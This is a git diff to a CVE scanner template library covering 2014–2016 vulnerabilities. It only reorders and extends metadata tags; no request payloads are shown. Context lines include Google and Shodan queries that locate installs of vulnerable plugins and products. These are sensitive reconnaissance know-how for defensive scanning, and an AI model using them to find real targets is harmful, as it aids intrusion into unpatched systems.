b/config/nuclei-templates/cves/2014/CVE-2014-5111.yaml @@ -11,7 +11,7 @@ info: - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html classification: cve-id: CVE-2014-5111 - tags: cve,cve2014,lfi,trixbox + tags: packetstorm,cve,cve2014,lfi,trixbox,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-5258.yaml b/config/nuclei-templates/cves/2014/CVE-2014-5258.yaml index 78a397993..e1fefd393 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-5258.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-5258.yaml @@ -12,7 +12,7 @@ info: - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0 classification: cve-id: CVE-2014-5258 - tags: cve,cve2014,lfi + tags: edb,packetstorm,cve,cve2014,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-5368.yaml b/config/nuclei-templates/cves/2014/CVE-2014-5368.yaml index 35e226c47..ac4f9995e 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-5368.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-5368.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2014-5368 metadata: google-query: inurl:"/wp-content/plugins/wp-source-control" - tags: cve,cve2014,wordpress,wp-plugin,lfi + tags: cve,cve2014,wordpress,wp-plugin,lfi,edb,seclists requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-6308.yaml b/config/nuclei-templates/cves/2014/CVE-2014-6308.yaml index f71050692..2664ce990 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-6308.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-6308.yaml @@ -12,7 +12,7 @@ info: - https://www.netsparker.com/lfi-vulnerability-in-osclass/ classification: cve-id: CVE-2014-6308 - tags: cve,cve2014,lfi + tags: cve,cve2014,lfi,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-8682.yaml b/config/nuclei-templates/cves/2014/CVE-2014-8682.yaml index 79f240dc7..7625f0fcd 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-8682.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-8682.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-89 metadata: shodan-query: title:"Sign In - Gogs" - tags: cve,cve2014,sqli,gogs + tags: gogs,seclists,packetstorm,edb,cve,cve2014,sqli requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-8799.yaml b/config/nuclei-templates/cves/2014/CVE-2014-8799.yaml index 577487a5c..88fc61b78 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-8799.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-8799.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2014-8799 metadata: google-query: inurl:"/wp-content/plugins/dukapress" - tags: cve,cve2014,wordpress,wp-plugin,lfi + tags: cve,cve2014,wordpress,wp-plugin,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-9094.yaml b/config/nuclei-templates/cves/2014/CVE-2014-9094.yaml index 8dd6263e0..4056b74a4 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-9094.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-9094.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2014-9094 metadata: google-query: inurl:"/wp-content/plugins/dzs-videogallery" - tags: cve,cve2014,wordpress,xss,wp-plugin + tags: cve2014,wordpress,xss,wp-plugin,seclists,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-9119.yaml b/config/nuclei-templates/cves/2014/CVE-2014-9119.yaml index 51e94c2a9..eea176002 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-9119.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-9119.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2014-9119 cwe-id: CWE-22 - tags: cve,cve2014,wordpress,wp-plugin,lfi,wp,backup + tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-9444.yaml b/config/nuclei-templates/cves/2014/CVE-2014-9444.yaml index 9a35985c8..f84a8029e 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-9444.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-9444.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20210122092924/https://www.securityfocus.com/bid/71808/ classification: cve-id: CVE-2014-9444 - tags: cve,cve2014,wordpress,wp-plugin,xss + tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-9606.yaml b/config/nuclei-templates/cves/2014/CVE-2014-9606.yaml index 6c7ff99c8..615077835 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-9606.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-9606.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9606 cwe-id: CWE-79 - tags: cve,cve2014,netsweeper,xss + tags: cve2014,netsweeper,xss,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-9607.yaml b/config/nuclei-templates/cves/2014/CVE-2014-9607.yaml index cdbdffe67..676c2def0 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-9607.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-9607.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9607 cwe-id: CWE-79 - tags: cve,cve2014,netsweeper,xss + tags: packetstorm,cve,cve2014,netsweeper,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-9608.yaml b/config/nuclei-templates/cves/2014/CVE-2014-9608.yaml index ecb6d6688..b7bce998a 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-9608.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-9608.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9608 cwe-id: CWE-79 - tags: cve,cve2014,netsweeper,xss + tags: cve,cve2014,netsweeper,xss,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-9609.yaml b/config/nuclei-templates/cves/2014/CVE-2014-9609.yaml index 8edbc6409..a3be2897e 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-9609.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-9609.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.3 cve-id: CVE-2014-9609 cwe-id: CWE-22 - tags: cve,cve2014,netsweeper,lfi + tags: cve2014,netsweeper,lfi,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-9614.yaml b/config/nuclei-templates/cves/2014/CVE-2014-9614.yaml index 38595c2b6..0936e0766 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-9614.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-9614.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2014-9614 cwe-id: CWE-798 - tags: cve,cve2014,netsweeper,default-login + tags: cve,cve2014,netsweeper,default-login,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2014/CVE-2014-9615.yaml b/config/nuclei-templates/cves/2014/CVE-2014-9615.yaml index e79a75802..f787e8a2b 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-9615.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-9615.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9615 cwe-id: CWE-79 - tags: cve,cve2014,netsweeper,xss + tags: cve,cve2014,netsweeper,xss,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-9617.yaml b/config/nuclei-templates/cves/2014/CVE-2014-9617.yaml index a50ed20d7..f5ce9ecdd 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-9617.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-9617.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9617 cwe-id: CWE-601 - tags: cve,cve2014,netsweeper,redirect + tags: cve,cve2014,netsweeper,redirect,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-9618.yaml b/config/nuclei-templates/cves/2014/CVE-2014-9618.yaml index 189837b5a..7ae682bc9 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-9618.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-9618.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2014-9618 cwe-id: CWE-287 - tags: cve,cve2014,netsweeper,auth-bypass + tags: cve2014,netsweeper,auth-bypass,packetstorm,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-0554.yaml b/config/nuclei-templates/cves/2015/CVE-2015-0554.yaml index a812e5fc8..4689e2f4d 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-0554.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-0554.yaml @@ -12,7 +12,7 @@ info: - http://www.exploit-db.com/exploits/35721 classification: cve-id: CVE-2015-0554 - tags: cve,cve2015,pirelli,router,disclosure + tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015 requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-1000005.yaml b/config/nuclei-templates/cves/2015/CVE-2015-1000005.yaml index 327f34b62..d3f55c2a0 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-1000005.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-1000005.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1000005 cwe-id: CWE-22 - tags: cve,cve2015,wordpress,wp-plugin,lfi,wp + tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-1000010.yaml b/config/nuclei-templates/cves/2015/CVE-2015-1000010.yaml index daad071fc..20be79142 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-1000010.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-1000010.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1000010 cwe-id: CWE-22 - tags: cve,cve2015,wordpress,wp-plugin,lfi,wp + tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-1000012.yaml b/config/nuclei-templates/cves/2015/CVE-2015-1000012.yaml index ea629cb08..a50788f1c 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-1000012.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-1000012.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-200 metadata: google-query: inurl:"/wp-content/plugins/mypixs" - tags: cve,cve2015,wordpress,wp-plugin,lfi + tags: cve2015,wordpress,wp-plugin,lfi,wpscan,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-1503.yaml b/config/nuclei-templates/cves/2015/CVE-2015-1503.yaml index 956df8c34..70821ebe5 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-1503.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-1503.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-200 metadata: shodan-query: title:"icewarp" - tags: cve,cve2015,icewarp,lfi,mail + tags: lfi,mail,packetstorm,cve,cve2015,icewarp requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-1579.yaml b/config/nuclei-templates/cves/2015/CVE-2015-1579.yaml index 2f440ca31..49058f62b 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-1579.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-1579.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-22 metadata: google-dork: inurl:/wp-content/plugins/revslider - tags: cve,cve2015,wordpress,wp-plugin,lfi,revslider,wp + tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015 requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-2067.yaml b/config/nuclei-templates/cves/2015/CVE-2015-2067.yaml index 192dee2d5..ea3890184 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-2067.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-2067.yaml @@ -13,7 +13,7 @@ info: cve-id: CVE-2015-2067 metadata: shodan-query: http.component:"Magento" - tags: cve,cve2015,lfi,magento,magmi,plugin + tags: plugin,edb,packetstorm,cve,cve2015,lfi,magento,magmi requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-2068.yaml b/config/nuclei-templates/cves/2015/CVE-2015-2068.yaml index b9ba00a1e..6bf5df4e8 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-2068.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-2068.yaml @@ -14,7 +14,7 @@ info: metadata: shodan-query: http.component:"Magento" verified: "true" - tags: cve,cve2015,magento,magmi,xss,plugin + tags: plugin,edb,packetstorm,cve,cve2015,magento,magmi,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-2080.yaml b/config/nuclei-templates/cves/2015/CVE-2015-2080.yaml index 41ba31406..26e8a1b2c 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-2080.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-2080.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2015-2080 cwe-id: CWE-200 - tags: cve,cve2015,jetty + tags: cve,cve2015,jetty,packetstorm requests: - method: POST diff --git a/config/nuclei-templates/cves/2015/CVE-2015-2166.yaml b/config/nuclei-templates/cves/2015/CVE-2015-2166.yaml index 143042641..6b70de017 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-2166.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-2166.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20210122142229/https://www.securityfocus.com/bid/73901/ classification: cve-id: CVE-2015-2166 - tags: cve,cve2015,lfi,ericsson + tags: cve,cve2015,lfi,ericsson,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-3224.yaml b/config/nuclei-templates/cves/2015/CVE-2015-3224.yaml index f21f392d8..34a797940 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-3224.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-3224.yaml @@ -12,7 +12,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 classification: cve-id: CVE-2015-3224 - tags: cve,cve2015,rce,rails,ruby + tags: ruby,hackerone,cve,cve2015,rce,rails requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-3306.yaml b/config/nuclei-templates/cves/2015/CVE-2015-3306.yaml index 97c64d525..80eee4953 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-3306.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-3306.yaml @@ -13,7 +13,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-3306 classification: cve-id: CVE-2015-3306 - tags: cve,cve2015,ftp,rce,network,proftpd + tags: cve,cve2015,ftp,rce,network,proftpd,edb network: - inputs: diff --git a/config/nuclei-templates/cves/2015/CVE-2015-3337.yaml b/config/nuclei-templates/cves/2015/CVE-2015-3337.yaml index a943db2c2..6a683cf9f 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-3337.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-3337.yaml @@ -13,7 +13,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-3337 classification: cve-id: CVE-2015-3337 - tags: cve,cve2015,elastic,lfi,elasticsearch,plugin + tags: edb,cve,cve2015,elastic,lfi,elasticsearch,plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-3648.yaml b/config/nuclei-templates/cves/2015/CVE-2015-3648.yaml index ac2a81225..efac6418d 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-3648.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-3648.yaml @@ -13,7 +13,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-3648 classification: cve-id: CVE-2015-3648 - tags: cve,cve2015,lfi,resourcespace + tags: lfi,resourcespace,packetstorm,cve,cve2015 requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-3897.yaml b/config/nuclei-templates/cves/2015/CVE-2015-3897.yaml index ab62eff7c..5090eb4c3 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-3897.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-3897.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2015-3897 cwe-id: CWE-22 - tags: cve,cve2015,bonita,lfi,unauth + tags: unauth,packetstorm,cve,cve2015,bonita,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-4127.yaml b/config/nuclei-templates/cves/2015/CVE-2015-4127.yaml index 232afeb1d..98b202643 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-4127.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-4127.yaml @@ -11,7 +11,7 @@ info: - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408 - https://nvd.nist.gov/vuln/detail/CVE-2015-4127 - https://wordpress.org/plugins/church-admin/changelog/ - tags: cve,cve2015,wordpress,xss,wp-plugin,wp + tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-4414.yaml b/config/nuclei-templates/cves/2015/CVE-2015-4414.yaml index b534590b2..9d4911c85 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-4414.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-4414.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2015-4414 metadata: google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player" - tags: cve,cve2015,wordpress,wp-plugin,lfi + tags: cve,cve2015,wordpress,wp-plugin,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-4632.yaml b/config/nuclei-templates/cves/2015/CVE-2015-4632.yaml index 0957becd0..e0c29e86d 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-4632.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-4632.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.5 cve-id: CVE-2015-4632 cwe-id: CWE-22 - tags: cve,cve2015,lfi + tags: cve,cve2015,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-4666.yaml b/config/nuclei-templates/cves/2015/CVE-2015-4666.yaml index 445e4250b..374b84c7b 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-4666.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-4666.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.5 cve-id: CVE-2015-4666 cwe-id: CWE-22 - tags: cve,cve2015,xceedium,xsuite,lfi + tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015 requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-4668.yaml b/config/nuclei-templates/cves/2015/CVE-2015-4668.yaml index 071a213f2..5b44654f5 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-4668.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-4668.yaml @@ -16,7 +16,7 @@ info: cvss-score: 6.1 cve-id: CVE-2015-4668 cwe-id: CWE-601 - tags: cve,cve2015,redirect,xsuite,xceedium + tags: cve,cve2015,redirect,xsuite,xceedium,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-4694.yaml b/config/nuclei-templates/cves/2015/CVE-2015-4694.yaml index 4cdcf64b6..62cb6ae9e 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-4694.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-4694.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-22 metadata: google-query: inurl:"/wp-content/plugins/zip-attachments" - tags: lfi,wordpress,cve,cve2015,wp-plugin + tags: cve2015,wp-plugin,wpscan,lfi,wordpress,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-5354.yaml b/config/nuclei-templates/cves/2015/CVE-2015-5354.yaml index 5af1fedb8..f20d2dfa3 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-5354.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-5354.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2015-5354 cwe-id: CWE-601 - tags: cve,cve2015,redirect,novius + tags: packetstorm,cve,cve2015,redirect,novius requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-5461.yaml b/config/nuclei-templates/cves/2015/CVE-2015-5461.yaml index 171daa2ec..5c54d1362 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-5461.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-5461.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2015-5461 metadata: google-query: inurl:"/wp-content/plugins/stageshow/" - tags: redirect,cve,cve2015,wordpress,wp-plugin + tags: wpscan,seclists,redirect,cve,cve2015,wordpress,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-5471.yaml b/config/nuclei-templates/cves/2015/CVE-2015-5471.yaml index 5100dc257..e59da8f5d 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-5471.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-5471.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-22 metadata: google-query: inurl:"/wp-content/plugins/wp-swimteam" - tags: cve,cve2015,wordpress,wp-plugin,lfi + tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-5531.yaml b/config/nuclei-templates/cves/2015/CVE-2015-5531.yaml index a2eacdaac..5b2fae0e3 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-5531.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-5531.yaml @@ -12,7 +12,7 @@ info: - https://www.elastic.co/community/security/ classification: cve-id: CVE-2015-5531 - tags: cve,cve2015,elasticsearch + tags: vulhub,packetstorm,cve,cve2015,elasticsearch requests: - raw: diff --git a/config/nuclei-templates/cves/2015/CVE-2015-6477.yaml b/config/nuclei-templates/cves/2015/CVE-2015-6477.yaml index 7f64995b4..a14472ddd 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-6477.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-6477.yaml @@ -11,7 +11,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-6477 classification: cve-id: CVE-2015-6477 - tags: cve,cve2015,xss,iot,nordex,nc2 + tags: xss,iot,nordex,nc2,seclists,cve,cve2015 requests: - method: POST diff --git a/config/nuclei-templates/cves/2015/CVE-2015-6920.yaml b/config/nuclei-templates/cves/2015/CVE-2015-6920.yaml index e0472e1ac..473b0a70f 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-6920.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-6920.yaml @@ -11,7 +11,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 classification: cve-id: CVE-2015-6920 - tags: cve,cve2015,wordpress,wp-plugin,xss + tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-7377.yaml b/config/nuclei-templates/cves/2015/CVE-2015-7377.yaml index 621291ab6..cb6e058ee 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-7377.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-7377.yaml @@ -12,7 +12,7 @@ info: - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html classification: cve-id: CVE-2015-7377 - tags: cve,cve2015,wordpress,wp-plugin,xss + tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-7780.yaml b/config/nuclei-templates/cves/2015/CVE-2015-7780.yaml index c65f6d656..5286df5ca 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-7780.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-7780.yaml @@ -16,7 +16,7 @@ info: cvss-score: 6.5 cve-id: CVE-2015-7780 cwe-id: CWE-22 - tags: cve,cve2015,lfi,manageengine + tags: manageengine,edb,cve,cve2015,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-7823.yaml b/config/nuclei-templates/cves/2015/CVE-2015-7823.yaml index 1f595d4ed..5df9229ec 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-7823.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-7823.yaml @@ -11,7 +11,7 @@ info: - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html classification: cve-id: CVE-2015-7823 - tags: cve,cve2015,kentico,redirect + tags: cve,cve2015,kentico,redirect,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-8399.yaml b/config/nuclei-templates/cves/2015/CVE-2015-8399.yaml index 65dd19a19..9125c4579 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-8399.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-8399.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-200 metadata: shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2015,atlassian,confluence + tags: edb,cve,cve2015,atlassian,confluence requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-9414.yaml b/config/nuclei-templates/cves/2015/CVE-2015-9414.yaml index 86aee31f4..1fc165349 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-9414.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-9414.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: google-query: inurl:"/wp-content/plugins/wp-symposium" - tags: cve,cve2015,wordpress,wp-plugin,xss + tags: xss,wpscan,cve,cve2015,wordpress,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2015/CVE-2015-9480.yaml b/config/nuclei-templates/cves/2015/CVE-2015-9480.yaml index 400828852..8a5c211e3 100644 --- a/config/nuclei-templates/cves/2015/CVE-2015-9480.yaml +++ b/config/nuclei-templates/cves/2015/CVE-2015-9480.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-22 metadata: google-query: inurl:"/wp-content/plugins/robotcpa" - tags: cve,cve2015,wordpress,wp-plugin,lfi + tags: wp-plugin,lfi,edb,cve,cve2015,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2016/CVE-2016-1000139.yaml b/config/nuclei-templates/cves/2016/CVE-2016-1000139.yaml index 2d8800256..f12cd7064 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-1000139.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-1000139.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: google-query: inurl:"/wp-content/plugins/infusionsoft" - tags: cve,cve2016,wordpress,wp-plugin,xss + tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2016/CVE-2016-1000142.yaml b/config/nuclei-templates/cves/2016/CVE-2016-1000142.yaml index 71ce9648e..b0c809b33 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-1000142.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-1000142.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000142 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss + tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2016/CVE-2016-1000148.yaml b/config/nuclei-templates/cves/2016/CVE-2016-1000148.yaml index 4a166a046..fe1ef6ac4 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-1000148.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-1000148.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000148 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss + tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2016/CVE-2016-10033.yaml b/config/nuclei-templates/cves/2016/CVE-2016-10033.yaml index 17b510dc4..6f283957e 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-10033.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-10033.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2016-10033 cwe-id: CWE-77 - tags: wordpress,cve,cve2016,rce + tags: cve,cve2016,rce,edb,wordpress requests: - raw: diff --git a/config/nuclei-templates/cves/2016/CVE-2016-10134.yaml b/config/nuclei-templates/cves/2016/CVE-2016-10134.yaml index 742910222..38b1ab206 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-10134.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-10134.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2016-10134 cwe-id: CWE-89 - tags: cve,cve2016,zabbix,sqli + tags: cve,cve2016,zabbix,sqli,vulhub requests: - 